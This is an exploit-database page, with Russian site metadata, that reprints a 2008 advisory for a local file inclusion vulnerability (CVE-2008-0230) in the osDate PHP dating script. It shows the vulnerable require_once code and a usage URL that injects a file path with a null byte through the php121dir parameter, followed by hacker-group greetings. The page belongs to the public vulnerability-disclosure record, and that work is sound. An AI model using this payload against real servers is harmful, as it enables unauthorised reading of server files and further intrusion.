- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4870
- Проверка EDB
-
- Пройдено
- Автор
- COLD ZERO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-0230
- Дата публикации
- 2008-01-09
Код:
=========================================================================
osData <= 2.08 Modules Php121 Local File Include Vulnerability
=========================================================================
Found by :
Cold z3ro , http://www.Hackteach.org/cc/
=========================================================================
Download :
http://gscripts.net/free-php-scripts/Dating_Scripts/osDate/details.html
=========================================================================
Bug :
if (file_exists($php121dir . "php121config.php")) { <= line 34
require_once($php121dir . "php121config.php");
} else {
die ("PHP121 configuration file does not exist!");
}
=========================================================================
About :
osData is php dating script fully integrates with major bulletin boards
(phpBB, vBulletin ) and FlashChat and provides several payment modules,
multiple skins, and free upgrade .
=========================================================================
Usage :
http://host/osData/php121/php121db.php?php121dir=[ File ]%00
=========================================================================
Greets :
Hack Teach Masters And Members , Xp10 Masters
=========================================================================
Plestine Hackers SQl Command :
0 update palestine set palestine = 'Long live My Homeland';
=========================================================================
# milw0rm.com [2008-01-09]- Источник
- www.exploit-db.com
